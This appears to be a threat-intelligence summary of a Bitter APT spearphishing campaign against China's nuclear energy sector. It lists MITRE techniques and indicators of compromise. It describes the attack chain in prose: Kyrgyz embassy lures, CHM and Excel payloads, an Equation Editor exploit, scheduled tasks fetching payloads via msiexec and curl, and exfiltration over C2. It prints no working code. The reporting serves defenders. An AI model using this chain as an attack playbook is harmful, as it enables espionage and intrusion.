Threat Research

Phishing Campaign Targets Chinese Nuclear Energy Industry

Securonix

Intezer traces Bitter APT activity targeting the Chinese nuclear energy sector in an Asia-Pacific espionage campaign, ties it to prior Bitter APT tooling including CHM/Excel payloads and Microsoft Office exploits. The operation uses social engineering with lures from a Kyrgyz embassy, layered with obfuscation and decoys, and relies on scheduled tasks, MSI/PowerShell techniques, and C2 over HTTPS to maintain persistence and data exfiltration.
Read more: https://www.intezer.com/blog/research/phishing-campaign-targets-nuclear-energy-industry/

Keypoints

  • Bitter APT is conducting an ongoing espionage campaign targeting energy and government sectors in Asia, including China.
  • Phishing emails impersonate the Embassy of Kyrgyzstan and lure recipients in China’s nuclear energy sector to download RAR attachments containing CHM or Excel payloads.
  • New layers of obfuscation and additional decoys are used to hinder analysis and enhance social engineering.
  • CHM and Excel payloads deliver persistence mechanisms and download additional payloads, including downloader modules and potential plugins.
  • The Excel payload uses an Equation Editor exploit to create scheduled tasks that fetch the next-stage payloads via curl and reveal infected machine names.

MITRE Techniques

  • [T1589.002] Email Addresses – Reconnaissance – The actor gathers target email addresses to target with spearphishing emails. Quote: ‘The name and email address used to send the phishing emails is crafted to look like it is coming from an “Embassy in Beijing.”’
  • [T1566.001] Spearphishing Attachment – Initial Access – Phishing emails deliver RAR attachments containing CHM or Excel payloads. Quote: ‘We identified seven emails pretending to be from the Embassy of Kyrgyzstan, being sent to recipients in the nuclear energy industry in China.’
  • [T1059.001] PowerShell – Execution – Encoded PowerShell is used by CHM payload; CHM version 2 uses an encoded PowerShell command stage. Quote: ‘The second version of the CHM payload abstracts the same activity through an encoded PowerShell command stage.’
  • [T1203] Exploitation for Client Execution – Execution – Microsoft Office exploits (Excel Equation Editor) are used to execute code. Quote: ‘The Excel payloads simply contain an Equation Editor exploit that creates two different scheduled tasks.’
  • [T1053.005] Scheduled Task – Persistence – CHM and Excel payloads create scheduled tasks for persistence and execution. Quote: ‘This activity appears to be a continuation of the tactics and campaign that Bitter APT have been using since at least 2021.’
  • [T1218.007] Msiexec – Defense Evasion – Msiexec is used to launch the next stage payloads. Quote: ‘The first version of the CHM file will create a scheduled task that will use the living off the land binary msiexec to execute a remote MSI payload from the C2.’
  • [T1218.001] Compiled HTML File – Defense Evasion – CHM files are used to deliver payloads. Quote: ‘CHM files are used to deliver payloads.’
  • [T1036] Masquerading – Defense Evasion – Files are masqueraded as legitimate files and scheduled tasks are named after common tasks (e.g., Adobe Updater). Quote: ‘masquerading as legitimate files and scheduled tasks are named after common tasks (eg. Adobe Updater)’
  • [T1082] System Information Discovery – Discovery – First-stage payloads fetch computer and user names. Quote: ‘System Information Discovery’ and ‘fetch Computer and User names.’
  • [T1071.001] Web Protocols – Command and Control – HTTPS is used for C2 communication. Quote: ‘HTTPS is used for C2 communication.’
  • [T1041] Exfiltration Over C2 Channel – Command and Control – Data can be exfiltrated. Quote: ‘Data can be exfiltrated.’

Indicators of Compromise

  • [File Hashes (SHA256)] Email-related payloads – 5f663f15701f429f17cc309d10ca03ee00fd20f733220cc9d2502eff5d0cd1a1, eb7aebded5549f8b006e19052e0d03dc9095c75a800897ff14ef872f18c8650e (Email)
  • [File Hashes (SHA256)] Email-related payloads – cac239cf09a6a5bc1f9a3b29141336773c957d570212b97f73e13122fe032179, 8d2f6b0d7a6a06708593cc64d9187878ea9d2cc3ae9a657926aa2a8522b93f74 (Email)
  • [File Hashes (SHA256)] Additional attachments – 33905e2db3775d2e8e75c61e678d193ac2bab5b5a89d798effbceb9ab202d799 (Email), 5c85194ade91736a12b1eeeb13baa0b0da88c5085ca0530c4f1d86342170b3bc (Email)
  • [File Hashes (SHA256)] CHM/CHM variants and XLS payloads – Ef4fb1dc3d1ca5ea8a88cd94596722b93524f928d87dff0d451d44da4e9181f1 (Email)
  • [File Hashes (SHA256)] Miscellaneous payloads – b2566755235c1df3371a7650d94339e839efaa85279656aa9ab4dc4f2d94bbfa (RAR), 33a20950e7f4b2191706ddf9089f1e91be1e5384cca00a57cf6b58056f70c96b (RAR)
  • [File Hashes (SHA256)] Additional attachments – 7e7e90b076ef3ea4ef8ed4ef14fb599a2acb15d9ce00c78e5949186da1e355cf (RAR), 07504fcef717e6b74ed381e94eab5a9140171572b5572cda87b275e3873c8a88 (XLS)
  • [File Hashes (SHA256)] CHM payloads – 06b4c1f46845cee123b2200324a3ebb7fdbea8e2c6ef4135e3f943bd546a2431 (CHM), ded0635c5ef9c3d63543abc36a69b1176875dba84ca005999986bd655da3a446 (CHM)
  • [Network] Domains – qwavemediaservice[.]net, mirzadihatti[.]com, coauthcn[.]com

Read more: https://www.intezer.com/blog/research/phishing-campaign-targets-nuclear-energy-industry/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint